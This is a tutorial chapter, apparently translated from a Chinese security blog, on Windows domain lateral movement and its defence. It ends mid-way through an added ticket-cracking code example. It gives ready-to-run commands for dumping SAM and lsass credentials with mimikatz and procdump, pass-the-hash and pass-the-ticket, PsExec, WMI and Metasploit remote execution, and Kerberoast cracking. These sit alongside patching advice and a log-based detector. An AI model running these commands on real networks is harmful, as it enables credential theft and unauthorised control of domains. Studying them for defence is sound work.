
Chapter 5: Intra-domain lateral movement analysis and defense

2022-06-10 00:51:00 nigo134

Lateral movement inside a domain is a technique widely used in intranet attacks, especially in advanced persistent threats (APT). Starting from a compromised system as a foothold, the attacker reaches other hosts in the domain and expands the set of assets under control: files and stored credentials on the foothold, databases reachable from it, domain controllers and other critical assets.
Through such attacks the attacker may eventually gain access to the domain controller and take full control of the Windows infrastructure and of the key business accounts. Privileged accounts therefore need strong, unique passwords, and administrators should rotate them regularly: once a password changes, any hash or ticket the attacker has already captured for it stops working, which limits how far a single compromised machine can take them.

Commonly used Windows Remote connection and related commands

1. IPC$

IPC$ is the named-pipe share that Windows exposes for inter-process communication (that is what "IPC" stands for). A client that authenticates to it with a valid user name and password obtains that user's permissions on the host; administrators normally use it to manage machines remotely and to browse their shared resources.
An ipc$ connection to a target gives more than file access (upload and download): commands such as dir, tasklist, at and schtasks can be run against the target over the same session to enumerate its directory structure, user list and other information. Every one of these commands authenticates to the target and leaves a network logon event there.

 Establish an ipc$ connection
	net use \\192.168.1.106\ipc$ "ning" /user:ning
	net use f: \\192.168.43.2\c$ "@nl1345834516" /user:"administrator"  (maps the target's C: drive to the local F: drive; other drive letters work the same way)
 List current connections
	net use
 dir command
	dir \\192.168.43.247\c$
 tasklist command
	tasklist /S 192.168.43.247 /U ning /P ning

 Check the target's clock (needed before scheduling a task on it)
	net time \\192.168.1.102

 copy command
	copy test.bat \\192.168.1.102\c$

 Schedule a task
	 Target host <= Windows Server 2008 (at.exe)
	at \\192.168.1.102 16:45 c:\test.bat

	 Target host >= Windows Server 2012 (at.exe no longer works there; use schtasks)
	schtasks /create /s 192.168.43.247 /tn test /sc onstart /tr c:\test.bat /ru system /f
 Run the task immediately instead of waiting for its trigger
	schtasks /run /s 192.168.43.247 /i /tn "test"

 Remove the ipc$ connection
	net use \\192.168.43.3\ipc$ /del /y

 Conditions for using ipc$

(1) Ports 139 and 445 are open
ipc$ provides remote logon and access to the default shares over SMB. Port 139 carries SMB over NetBIOS sessions; port 445 carries SMB directly over TCP (available since Windows 2000). Both are used for file and printer sharing, so ipc$ normally requires that 139 or 445 is reachable.

(2) The administrator has left the default (administrative) shares enabled
The administrative shares are enabled by default to make remote administration easier. They cover every logical drive (c$, d$, e$ and so on) and the system directory winnt or windows (admin$). Once an ipc$ session exists, these shares can be accessed through it.

Windows hash acquisition: analysis and prevention

Windows does not store a user's plaintext password; it stores one or two hashes of it. In a domain the user records live in ntds.dit on the domain controllers; on a stand-alone machine they live in the SAM database. A stored Windows credential has two parts, the LM hash and the NTLM (NT) hash, and the usual dump format is:

username:RID:LM-HASH:NT-HASH:::

The LM hash ("LAN Manager hash") is the scheme Microsoft used in early Windows versions; it is built on DES. The password is truncated to 14 characters, converted to upper case and split into two 7-byte halves, and each half is used as a DES key to encrypt a fixed string, which makes it very easy to crack. It was kept only for compatibility, and since Windows Vista and Windows Server 2008 it is disabled by default. An LM hash can only be produced for passwords of at most 14 characters, so setting a password of 15 characters or more also prevents LM storage on older systems. When LM storage is disabled, the LM field of a dumped hash is the fixed value aad3b435b51404eeaad3b435b51404ee (the LM hash of the empty string), which tells you the LM hash is empty or disabled.

The NT hash (usually called the NTLM hash) is the replacement Microsoft introduced for better security while keeping compatibility: it is the MD4 digest of the password encoded as UTF-16LE. It is unsalted, so identical passwords produce identical hashes, and the hash itself is the secret used in NTLM authentication, which is why it can be passed directly. From Windows Vista (client) and Windows Server 2008 (server) onwards the NT hash is the only password hash stored by default.
 

Capturing passwords on a single machine and preventing it

Dumping hashes or plaintext passwords from a Windows machine requires local administrator rights, and for some operations SYSTEM. Local user names, hashes and related security data are stored in the SAM file. The lsass.exe process enforces the Windows security policy (local security policy and logon policy) and holds the credentials of logged-on users in memory, so tools can extract hashes and plaintext passwords either from the lsass.exe process or from the SAM file.
The SAM file is saved in C:\Windows\System32\config. It is locked while Windows is running and cannot simply be copied. In a penetration test the classic approach is to shut Windows down, boot a PE environment and copy the SAM file directly; alternatives are a Volume Shadow Copy (VSS) or exporting the hives with reg save. Below, the common tools and methods for single-machine password capture are analysed and preventive suggestions are given.
 

1. Export the sam and system hives and extract the password hashes offline

(1) On the target host, in an administrator cmd, run:
reg save hklm\sam sam.hive        # export the SAM hive to a file with reg save
reg save hklm\system system.hive  # the SYSTEM hive holds the boot key needed to decrypt SAM

(2) Open mimikatz with administrator rights and run:
lsadump::sam /sam:sam.hive /system:system.hive    # put the two files in the same directory as mimikatz

2. Read the local SAM directly with mimikatz

(1) Upload mimikatz to the target (after whatever AV evasion is needed) and start it from the command line:
privilege::debug    # obtain SeDebugPrivilege
token::elevate      # impersonate SYSTEM
lsadump::sam        # read the local SAM and obtain the NTLM hashes

 or

(2) mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"   # read hashes and plaintext passwords of logged-on users from lsass memory

3. Read an lsass.dmp file offline with mimikatz

(1) Export lsass.dmp with Procdump (a Microsoft Sysinternals tool)
	procdump.exe -accepteula -ma lsass.exe lsass.dmp

(2) Extract the password hashes from lsass.dmp with mimikatz
 Run mimikatz and load lsass.dmp into it:
	sekurlsa::minidump lsass.dmp       # "Switch to MINIDUMP" confirms the file loaded
	sekurlsa::logonPasswords full      # dump hashes and any plaintext passwords

Prevention methods for single-machine password capture

To stop user passwords from sitting in memory in plaintext, Microsoft released update KB2871997 together with the WDigest UseLogonCredential registry setting.
Windows 8.1 and Windows Server 2012 R2 and later no longer keep the WDigest plaintext credential in lsass by default, so an attacker cannot obtain plaintext passwords from memory there. On older versions (Windows 7, 8, Server 2008 R2 and 2012), installing KB2871997 and setting UseLogonCredential to 0 gives the same protection.
In day-to-day maintenance, the state of WDigest caching can be checked from the UseLogonCredential registry value. If the value is 1, the next time a user logs on an attacker can pull the plaintext password with a tool such as mimikatz. Make sure the value is 0, so that plaintext passwords do not appear in memory. The value only affects logons that happen after it is changed; credentials already cached stay in lsass until the user logs off or the machine reboots.

KB2871997 is often summarised as "disables WDigest and blocks local accounts from remote access". More precisely, it backports several Windows 8.1 protections: the UseLogonCredential switch, Protected Users support, clearing of credentials at logoff, and two new well-known SIDs (Local account, S-1-5-113, and Local account and member of Administrators group, S-1-5-114) that administrators can use in "Deny access to this computer from the network" policies. The update does not block local accounts on its own. The built-in Administrator (RID 500) is the exception that matters in practice: UAC remote restrictions do not apply to it, so its hash can be used for pass-the-hash against every machine that shares the password.

  Cracking the hashes with hashcat

hashcat -a 0 -m <type> <hashfile> <dict1> <dict2>
  • -a 0: dictionary (straight) attack mode.
  • -m <type>: hash type of the entries in <hashfile>; 1000 is NTLM (the NT hash), 3000 is LM.
  • <hashfile>: text file with one hash per line (full user:RID:LM:NT::: lines work with the --username option), waiting to be cracked.
  • <dict1> <dict2>: the dictionary files to try.

  How to prevent attackers from grabbing plaintext passwords and hashes

1. Raise the domain to the Windows Server 2012 R2 functional level and use Protected Users

Windows Server 2012 R2 introduced a group named "Protected Users". Members of this group cannot authenticate with NTLM, WDigest or CredSSP, and their Kerberos tickets use AES only, so tools such as mimikatz cannot recover a plaintext password or a usable NTLM hash for them from lsass. Put the accounts that must be protected (domain admins, help-desk accounts) in this group; test first, because legacy applications that depend on NTLM stop working for these users.

2. Install KB2871997

KB2871997 is the update Microsoft published in response to pass-the-hash attacks that abuse PsExec, WMI and ipc$ connections. It adds the well-known SIDs S-1-5-113 (Local account) and S-1-5-114 (Local account and member of Administrators group), so that a single entry under "Deny access to this computer from the network" can stop every local account from logging on remotely; the update denies nothing by itself. Whatever the policy, the built-in local Administrator (RID 500) is exempt from UAC remote restrictions, and renaming the account does not change its SID, so an attacker who holds its hash can still move laterally to every machine that shares the same local Administrator password. After installing KB2871997 you should therefore still disable the default Administrator account (or give every machine a unique password, for example with LAPS) to protect against pass-the-hash.

In daily maintenance the update can be applied through Windows Update or downloaded from Microsoft's website.

3. Disable plaintext password storage in memory through the registry

Starting with Windows XP, Windows included an authentication protocol called WDigest. To support HTTP Digest authentication it kept the user's plaintext password in lsass memory after logon. The following command disables that behaviour:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f    # create the value and set it to 0; after the user logs off and on again, the plaintext password is no longer kept in memory

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential    # confirm the value was written

Defending against mimikatz

mimikatz needs SeDebugPrivilege to read hashes or plaintext passwords, because it has to open the lsass process (without the debug privilege it cannot read lsass memory). Defence can target this: remove the Administrators group from the "Debug programs" user right (Local Security Policy > User Rights Assignment), so that an attacker with an ordinary administrator account cannot obtain it. An attacker who is already SYSTEM does not need the privilege, so this raises the bar rather than closing the door; running lsass as a protected process (RunAsPPL) and Credential Guard close it further on systems that support them.
 

Pass-the-hash attack: analysis and prevention

Reference: "Introduction to the principle of pass-the-hash attacks", Baidu Security Community

Hash values: if a web site stores its users' passwords in plaintext, one flaw in the site leaks every user's password. Passwords are therefore stored as hashes. When a user sets a password, the server hashes it with a one-way, irreversible function and stores the digest; at login the entered password is hashed the same way and compared with the stored digest, and the login succeeds only if the two are identical. (Web applications today use salted, slow hashes such as bcrypt rather than plain MD5, which is too fast to resist brute force.)

Mainstream Windows versions authenticate users who access resources with the NT hash (NTLM authentication). Early Windows versions used the LM hash for this purpose, but an LM hash cannot be computed for passwords of 15 characters or more, and from Windows Vista and Windows Server 2008 on the LM hash is disabled by default. NTLM authentication never sends the plaintext password: the system converts it to the hash through an API such as LsaLogonUser and uses the hash to compute the challenge response. That is exactly why pass-the-hash works: the hash is the real secret, so an attacker who obtains a user's NT hash can authenticate as that user without ever knowing the password.

Pass the hash once the user name and password hash are known:

Run mimikatz:
privilege::debug
sekurlsa::pth /user:Administrator /domain:testlab /ntlm:f478e94103927311912ff00846210a30

# a new cmd.exe window opens; everything it does on the network authenticates with the injected hash
dir \\dc\c$

After the command runs, mimikatz opens a cmd window whose network credentials belong to the user that owns the hash.
From it the domain controller's C$ share can be listed, which the current user could not do before: the hash of a domain admin gave control of the domain controller.

Pass the key: instead of the NTLM hash, an AES-256 key of the account can be injected with /aes256:. On Windows 7/2008 R2/8/2012 this only works when KB2871997 is installed on the machine where mimikatz runs; Windows 8.1/2012 R2 and later support it out of the box.

Points to note in this experiment:

  • When a Kerberos key is injected (pass the key), dir must be given the host name, not the IP address, because Kerberos needs a service principal name for the target; with an IP address the request is rejected with "the user name or password is incorrect".
  • Besides an AES-256 key, an AES-128 key can also be passed.
  • Passing an AES key to a remote host requires KB2871997 (or a newer OS) on the local machine running mimikatz.
  • KB2871997 does not stop pass-the-hash with the NT hash of the RID 500 Administrator account or of any domain account; its local-account SIDs only help once a deny-network-logon policy is deployed.
  • The pass-the-hash function of mimikatz requires local administrator rights because of how it is implemented: it replaces the credential material of the new process inside lsass.exe, which needs a high-privilege handle to that process.
     

Impact of the KB2871997 update

Microsoft released KB2871997 in May 2014. It is frequently said that the update stops local administrator accounts from connecting to remote computers, so that a local administrator can no longer use PsExec, WMI, smbexec or schtasks against a remote machine or reach its file shares. What actually blocks non-500 local administrators over the network is UAC remote restriction, enabled by default since Windows Vista: their network logon receives a filtered, non-elevated token, so pass-the-hash with their hashes fails unless LocalAccountTokenFilterPolicy has been set to 1. KB2871997 adds the SIDs that let an administrator deny network logon to all local accounts, but only once that policy is configured. In practice, after KB2871997 the Administrator account (RID 500) remains the exception: pass-the-hash with its hash still works.
The point to stress is the RID 500 account. Renaming Administrator does not change its SID, so an attacker who moves laterally with the RID 500 account is not affected by KB2871997 at all. This deserves special attention in day-to-day maintenance: disable the account or make its password unique on every machine (for example with LAPS).
 

Pass-the-ticket attack: analysis and prevention

Reference: "Domain penetration: pass-the-ticket attacks", Zhihu

Passing a ticket with kekeo

Pass the ticket once the user name and NT hash are known (the process does not require administrator rights, because the tickets live in the current user's own logon session):

kekeo "tgt::ask /user:administrator /domain:testlab.com /ntlm:f478e94103927311912ff00846210a30"    # request a TGT from the KDC with the hash and write it as a .kirbi file in the current directory
kerberos::purge    # clear the tickets currently in memory from inside kekeo
 or
klist purge    # clear the tickets from the Windows command line

kerberos::ptt <name>.kirbi    # import the ticket file into the current session with kekeo; when the import completes, exit and use dir to view files on the remote host

After the import, access to the domain controller's file share can be tested remotely:
dir \\dc\c$

Notes, and how to defend against pass-the-ticket

  • Use the host name with dir. An IP address does not map to a service principal name, so Kerberos cannot be used and the access fails.
  • A ticket imported into memory is valid for 10 hours by default (the domain's maximum ticket lifetime).
  • Passing a ticket on the target machine does not require local administrator rights.
  • From these points the defence follows: treat the hash of every privileged account as equivalent to its password and rotate it regularly, so that stolen hashes and the tickets derived from them expire; put privileged accounts in Protected Users, whose tickets are AES-only and shorter-lived; and audit ticket requests (events 4768 and 4769) for accounts requesting tickets from hosts they never use.

Using PsExec

PsExec is a powerful tool in the SysInternals suite. It was originally written for the batch administration of Windows hosts and works especially well in a domain. Attackers also use PsExec: it connects to the target through a command-line session and can fully control the machine without the graphical Remote Desktop Protocol (RDP), which lowers the chance that an administrator notices the activity. Because PsExec is a legitimate Microsoft tool it was long whitelisted by antivirus software; today most products flag or closely monitor it. PsExec runs on Windows Vista/NT 4.0/2000/XP/Server 2003/Server 2008/Server 2012/Server 2016 (including the 64-bit versions).

PsExec.exe usage

 With an ipc$ connection already established, create an interactive shell:
PsExec.exe -accepteula \\192.168.100.190 -s cmd.exe
    -accepteula:    the first run of PsExec shows a licence confirmation box; this parameter suppresses it
    -s:     run the remote process as SYSTEM, which gives a SYSTEM shell; without this parameter the shell runs as the connecting administrator

 Without a prior ipc$ connection (the password argument was scrubbed from the page and is shown as a placeholder):
psexec \\192.168.100.190 -u administrator -p <password> cmd.exe

 Run a single command and get its output back:
psexec \\192.168.100.190 -u administrator -p <password> cmd.exe /c "ipconfig"

Points to note when using PsExec:

  • The remote system must have the admin$ share enabled (it is by default); PsExec copies its service binary PSEXESVC.exe into it.
  • Once the connection to the target is established, the account and password do not need to be entered again.
  • When psexec executes a remote command it installs a service named PSEXESVC on the target (the -r option changes the name) and removes it afterwards. Installing and removing a service writes events to the System log (event 7045, "A service was installed in the system"), and the connection itself writes a network logon to the Security log, so during incident response the attack can be reconstructed from these logs.
  • With -s, PsExec gives an interactive SYSTEM shell directly.
     

Metasploit Medium psexec modular

search psexec
use exploit/windows/smb/psexec 
show options
set RHOSTS 1.1.1.7
set SMBPass 123
set SMBUser administrator
run

Type "shell" to get a shell with SYSTEM privileges (like PsExec itself, the module installs a service that runs as SYSTEM).

Using WMI

WMI stands for "Windows Management Instrumentation". Available since Windows 98 and built into every version from Windows 2000 on, WMI is a set of interfaces and tools for managing a computer locally or remotely.
Since PsExec became closely monitored on intranets and more and more antivirus vendors put it on their blacklists, attackers turned to WMI for lateral movement. Penetration tests show that when wmic.exe is used for lateral movement, Windows by default records nothing specific to the WMI call itself, which raises the cost of tracing the attack and lowers the probability that the attacker is noticed. It is not invisible, though: the target still records a network logon (event 4624, logon type 3) for the account used, and where process creation auditing (event 4688) or Sysmon is enabled the command shows up as a child process of WmiPrvSE.exe.

wmic /node:1.1.1.10 /user:Administrator /password:123456Aa process call create "cmd.exe /c ipconfig >c:\ip.txt"    # run a command through the target's cmd.exe and save the output on its C: drive

 wmic returns no output from the command, so establish an ipc$ connection and read the result with type:
net use \\1.1.1.8\ipc$ "123456Aa" /user:Administrator
type \\1.1.1.8\C$\ip.txt

The wmic command above starts the remote command through the Windows Management Instrumentation service of the target. The target must expose port 135 (the RPC endpoint mapper used by DCOM) and the dynamic RPC ports behind it, and the command runs on the remote system with the privileges of the supplied administrator account. If a firewall on the target blocks these ports, wmic cannot connect.
Because wmic gives no echo, ipc$ and type are needed to read the result. If wmic launches a malicious program, no WMI-specific log entry is produced by default; the only traces are the ones listed above.

wmiexec from the impacket toolkit (a semi-interactive shell over WMI; the password was scrubbed from the page and is shown as a placeholder):

wmiexec.py administrator:<password>@1.1.1.10
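The traces that PsExec, remote schtasks and WMI leave on the target, as discussed in the PsExec notes and in the WMI section above, can be turned into detection logic. The block below is an added example, not part of the original page: it runs three heuristics over constructed event records whose field names mirror the Windows events they stand for (System 7045 for the PSEXESVC service install, Security 4624/4698 for a task created inside a network logon session, Security 4688 for a shell spawned by WmiPrvSE.exe or PSEXESVC.exe). The "binary dropped straight into %SystemRoot%" rule is a heuristic and is labelled as such.

```python
import re

# Constructed sample records (not real telemetry). Field names mirror the
# Windows event log entries they stand for:
#   System 7045    "A service was installed in the system"  (PsExec's PSEXESVC)
#   Security 4624  "An account was successfully logged on"  (LogonType 3 = network)
#   Security 4698  "A scheduled task was created"           (schtasks /create /s, at)
#   Security 4688  "A new process has been created"         (WMI: child of WmiPrvSE.exe)
SAMPLE_EVENTS = [
    {"id": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": 7045, "ServiceName": "Spooler", "ImagePath": r"%SystemRoot%\System32\spoolsv.exe"},
    {"id": 7045, "ServiceName": "upd-svc", "ImagePath": r"%SystemRoot%\upd-svc.exe"},  # psexec -r upd-svc
    {"id": 4624, "TargetUserName": "ning", "LogonType": 3, "TargetLogonId": "0x3e7a1", "IpAddress": "192.168.43.3"},
    {"id": 4624, "TargetUserName": "alice", "LogonType": 2, "TargetLogonId": "0x1f2b", "IpAddress": "-"},
    {"id": 4698, "SubjectUserName": "ning", "SubjectLogonId": "0x3e7a1", "TaskName": r"\test"},
    {"id": 4698, "SubjectUserName": "alice", "SubjectLogonId": "0x1f2b", "TaskName": r"\Backup"},
    {"id": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /c ipconfig >c:\ip.txt"},
    {"id": 4688, "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

# Heuristic: a service binary dropped directly into the Windows directory, the way
# PsExec copies PSEXESVC.exe through ADMIN$. Legitimate services almost always live
# in a subdirectory such as System32, so this catches renamed PsExec services too.
_DROPPED_IN_SYSTEMROOT = re.compile(r"%SystemRoot%\\[^\\]+\.exe$", re.IGNORECASE)
_REMOTE_EXEC_PARENTS = (r"\wbem\wmiprvse.exe", r"\psexesvc.exe")


def detect_lateral_movement(events):
    """Return (rule, subject, detail) tuples for events that look like remote execution."""
    network_logons = {e["TargetLogonId"] for e in events
                      if e["id"] == 4624 and e.get("LogonType") == 3}
    findings = []
    for e in events:
        if e["id"] == 7045:
            if e["ServiceName"].upper() == "PSEXESVC" or _DROPPED_IN_SYSTEMROOT.match(e["ImagePath"]):
                findings.append(("psexec-service-install", e["ServiceName"], e["ImagePath"]))
        elif e["id"] == 4698 and e["SubjectLogonId"] in network_logons:
            # task created from a network logon session: schtasks /s or at from another host
            findings.append(("remote-task-creation", e["SubjectUserName"], e["TaskName"]))
        elif e["id"] == 4688:
            parent = e["ParentProcessName"].lower()
            if parent.endswith(_REMOTE_EXEC_PARENTS):
                findings.append(("remote-process-execution", parent.rsplit("\\", 1)[-1], e["CommandLine"]))
    return findings


if __name__ == "__main__":
    for finding in detect_lateral_movement(SAMPLE_EVENTS):
        print(finding)
```

The 4698 rule shows why the "WMI and schtasks leave no log" claim needs qualifying: the task creation itself may look local, but joining it to the 4624 event through the logon ID exposes that it was created over the network. The same join works for 4688 events on systems where "Creator Process Name" is recorded.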

SPNs in a domain environment

A Windows domain is built on Microsoft's Active Directory service, which groups users and computers spread across locations and departments, centralises resources and assigns access rights to them in a fine-grained way; this improves both the security of the network and the convenience of distributing and managing resources centrally. A domain runs many applications exposing many kinds of resources. To group, classify and distribute these resources sensibly, Microsoft assigns each service instance in the domain a service principal name (SPN).

SPN scanning

Related concepts

When Kerberos is used for authentication on the network, a service must have an SPN registered either under a built-in account (NetworkService, LocalSystem, i.e. the computer account) or under the user account the service runs as. For the built-in accounts the SPN is registered automatically; when a service runs under a domain user account, the SPN must be registered manually for that account. Because every service in the domain that takes part in Kerberos authentication needs an SPN, an attacker can simply query the domain controller for the SPNs of interest and learn which machine hosts each service, without scanning the network at all.
Kerberos uses the SPN to associate a service instance with its logon account. If several service instances are installed on one computer, each must have its own SPN, and one instance can have several SPNs when clients may address it under several names: an SPN always contains the host name the instance runs on, so an instance can register one SPN for each name or alias of its host. Under Kerberos, when an account and password are used to log on to Active Directory, the domain controller verifies them and the Key Distribution Center (KDC) issues a ticket-granting ticket (TGT) to the user, which serves as the user's identity credential when accessing resources.

An example. When a user needs to access an MSSQL service, the system queries the domain controller, as the current user, for the record whose SPN is "MSSQLSvc/...". Once the SPN is found, the user contacts the KDC again and sends it the TGT issued earlier as identity credential, together with the SPN to be accessed. The ticket-granting service (TGS) of the KDC decrypts and validates the TGT, then issues a service ticket for the requested SPN, encrypted with the key of the account that owns the SPN, and returns it together with the address of the service. That ticket lets the user access the MSSQL service.

The SPN format is as follows:

SPN = serviceclass "/" hostname [":"port"] ["/" servicename]
serviceclass: name of the service component
hostname: separated from the service class by "/"; the fully qualified domain name (FQDN) of the computer, i.e. computer name plus domain name
port: separated by a colon; the port number the service listens on
servicename: a string; the distinguished name (DN) of the service, its objectGuid, an Internet host name or a fully qualified domain name

Common SPN services

Example of an MSSQL service SPN:
MSSQLSvc/computer1.labtest.com:1433
MSSQLSvc: the service component; here the MSSQL service.
computer1.labtest.com: the host name is computer1, the domain is labtest.com.
1433: the listening port is 1433.
serviceclass and hostname are required; port and servicename are optional. The colon between hostname and port is only used when the service listens on a specific port.

Example of an Exchange service SPN:
exchangeMDB/EXCAS01.labtest.com

Example of an RDP service SPN:
TERMSERV/EXCAS01.labtest.com

Example of a WSMan/WinRM/PSRemoting service SPN:
WSMAN/EXCAS01.labtest.com

1. SPN scanning with a PowerShell script

Script download: https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSSQLServers
(the same repository also contains Discover-PSInterestingServices, used below; Discover-PSMSSQLServers lists only the MSSQL SPNs)

 Find all interesting SPNs
Import-Module .\Discover-PSInterestingServices
Discover-PSInterestingServices

2. List all SPNs in the domain with the built-in Windows tool

setspn -T domain -q */*    # -T selects the domain to query (replace "domain" with the domain name), -q */* queries every SPN
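As an added example (not code from the page or from the PowerShell-AD-Recon project), the block below parses SPNs according to the grammar given above and then processes scan output of the kind `setspn -T domain -q */*` prints. The sample output is constructed and its layout (a line with the owner's DN followed by tab-indented SPN lines) is assumed; the "user-owned SPN" filter uses the DN container as a heuristic and says so, since the real distinction is the object's class.

```python
import re

# Grammar from the page: SPN = serviceclass "/" hostname [":" port] ["/" servicename]
_SPN_RE = re.compile(
    r"^(?P<serviceclass>[^/]+)/(?P<hostname>[^/:]+)(?::(?P<port>\d+))?(?:/(?P<servicename>.+))?$"
)


def parse_spn(spn: str) -> dict:
    """Split an SPN into its components; port and servicename are None when absent."""
    m = _SPN_RE.match(spn.strip())
    if not m:
        raise ValueError(f"not a valid SPN: {spn!r}")
    parts = m.groupdict()
    parts["port"] = int(parts["port"]) if parts["port"] else None
    parts["spn"] = spn.strip()
    return parts


# Constructed output in the layout assumed for `setspn -T domain -q */*`: a line
# with the owning object's DN, then one tab-indented line per SPN.
SETSPN_OUTPUT = """\
Checking domain DC=labtest,DC=com
CN=COMPUTER1,CN=Computers,DC=labtest,DC=com
\tHOST/COMPUTER1
\tHOST/computer1.labtest.com
CN=mssql,CN=Users,DC=labtest,DC=com
\tMSSQLSvc/computer1.labtest.com:1433
CN=EXCAS01,CN=Computers,DC=labtest,DC=com
\texchangeMDB/EXCAS01.labtest.com
\tTERMSERV/EXCAS01.labtest.com
\tWSMAN/EXCAS01.labtest.com
CN=DC01,OU=Domain Controllers,DC=labtest,DC=com
\tldap/dc01.labtest.com/labtest.com

Existing SPN found!
"""


def parse_setspn_output(text: str) -> dict:
    """Map each owner DN to the list of its parsed SPNs."""
    owners, current = {}, None
    for line in text.splitlines():
        if line.startswith("CN="):
            current = line.strip()
            owners[current] = []
        elif line.startswith(("\t", " ")) and current:
            owners[current].append(parse_spn(line))
    return owners


def kerberoast_candidates(owners: dict) -> dict:
    """SPNs owned by user objects: their ticket key derives from a human-chosen
    password, which is what makes them worth Kerberoasting. Heuristic: computer
    objects live under CN=Computers or OU=Domain Controllers; a production check
    should use objectClass or a sAMAccountName ending in '$' instead."""
    return {
        dn: [s["spn"] for s in spns]
        for dn, spns in owners.items()
        if ",CN=Computers," not in dn and ",OU=Domain Controllers," not in dn
    }


if __name__ == "__main__":
    owners = parse_setspn_output(SETSPN_OUTPUT)
    for dn, spns in owners.items():
        print(dn, [(s["serviceclass"], s["hostname"], s["port"]) for s in spns])
    print("Kerberoast candidates:", kerberoast_candidates(owners))
```

The parser shows why the port matters: "MSSQLSvc/computer1.labtest.com" and "MSSQLSvc/computer1.labtest.com:1433" are different SPNs, and a ticket request must name the one that is actually registered.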

 

 Kerberoast attack: analysis and prevention

Kerberoast is an attack against the Kerberos protocol. To obtain a service ticket for a particular resource, a user sends the ticket-granting service (TGS) a request carrying a valid TGT and the SPN of the service. The KDC checks that the TGT is valid, but it does not check whether the user is allowed to use the service (authorisation is the service's job), so any authenticated domain user receives a ticket for any registered SPN. The service ticket is encrypted with the key of the account associated with the SPN; for the RC4_HMAC_MD5 encryption type that key is simply the account's NT hash. An attacker can therefore take the ticket offline and try candidate NT hashes until one decrypts it. When the right NT hash is found the ticket opens, and the password that produced that hash is the service account's password.
In a domain, Kerberoasting lets an attacker with ordinary user rights extract the credentials of service accounts from Active Directory. Most of the work is done offline and nothing is sent to the target system, so security devices raise no alarm. And because the domain policy of most networks is not strict enough (service account passwords never expire, service accounts have excessive privileges, service account passwords are no stronger than those of ordinary users), service account passwords are easily compromised by Kerberoasting.
 

1. Experiment: configure an MSSQL service and crack its service ticket

(1) Register the SPN manually

Enter the following command to register an SPN for the MSSQL service account manually:

setspn -A MSSQLSvc/computer1.labtest.com:1433 mssql    # -A adds the SPN to the account named mssql; -S does the same but first checks that the SPN is not already registered elsewhere

(2) View the corresponding SPN

 View all registered SPNs:
setspn -T domain -q */*

 View the SPNs registered to a specific user:
setspn -L labtest.com\mssql

(3) Use adsiedit.msc to view the user's SPN and other advanced attributes

(4) Configure the logon right of the service

 Grant the service account the "Log on as a service" right:
gpedit.msc\Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Log on as a service

(5) Change the encryption type
Because the default Kerberos encryption type on current domains is AES256_HMAC, which tgsrepcrack.py cannot crack, in this lab the allowed encryption types are restricted to RC4_HMAC_MD5 through group policy:

gpedit.msc\Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network security: Configure encryption types allowed for Kerberos

In a real domain the attacker does not need to touch group policy: on the Windows versions current when this was written, a user account whose msDS-SupportedEncryptionTypes attribute is unset (the default) is issued an RC4 service ticket when the client asks for RC4, and Kerberoasting tools ask for RC4 explicitly in the TGS-REQ. AES is only enforced for accounts where the attribute has been set to AES.

(6) Request the Kerberos service ticket for the SPN

 Open PowerShell and enter the following (the SPN must match the registered one exactly, including the port):
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/computer1.labtest.com:1433"

(7) Export the ticket

 In mimikatz, run the following to export the tickets in memory:
kerberos::list /export    # the tickets are written to .kirbi files in the current directory; the MSSQL one uses RC4_HMAC_MD5

(8) Crack the NTLM hash of the account behind the ticket offline with the Kerberoast scripts

Download the Kerberoast toolkit (the Python scripts by nidem on GitHub that include tgsrepcrack.py). It is written in Python 2, so a Python 2.7 environment is needed locally.

Copy the ticket file of the MSSQL service to Kali Linux.
The toolkit contains a script called tgsrepcrack.py whose job is to crack the NT hash behind a ticket offline. Open a terminal in Kali Linux and run:

python tgsrepcrack.py wordlist.txt mssql.kirbi

 If it succeeds, the password of the account behind the ticket is printed on the screen.
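What tgsrepcrack.py actually does with the ticket, and the "try NT hashes until the ticket opens" step described in the Kerberoast introduction above, is the RC4-HMAC (etype 23) check from RFC 4757. The block below is an added example, not code from the page or from the Kerberoast toolkit: it builds a stand-in service ticket encrypted under a constructed service-account NT hash (the hash of the weak password "password"), then recovers that key offline by verifying the HMAC checksum for each candidate. Candidates are given directly as NT hashes, which is the form the page describes; real tooling derives them from a wordlist as MD4 over the UTF-16LE password. The plaintext is a short stand-in for the DER-encoded EncTicketPart.

```python
import hashlib
import hmac
import os
import struct

# RFC 4120 key-usage number for the enc-part of a ticket (the value tgsrepcrack.py uses).
KEY_USAGE_TICKET = 2


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 stream cipher (key scheduling + keystream generation)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(nt_hash: bytes, plaintext: bytes, usage: int = KEY_USAGE_TICKET) -> bytes:
    """RFC 4757 RC4-HMAC (etype 23) as the KDC applies it to a service ticket:
    the key is the service account's NT hash."""
    k1 = _hmac_md5(nt_hash, struct.pack("<I", usage))
    data = os.urandom(8) + plaintext            # 8-byte confounder, then the payload
    checksum = _hmac_md5(k1, data)
    k3 = _hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(nt_hash: bytes, edata: bytes, usage: int = KEY_USAGE_TICKET):
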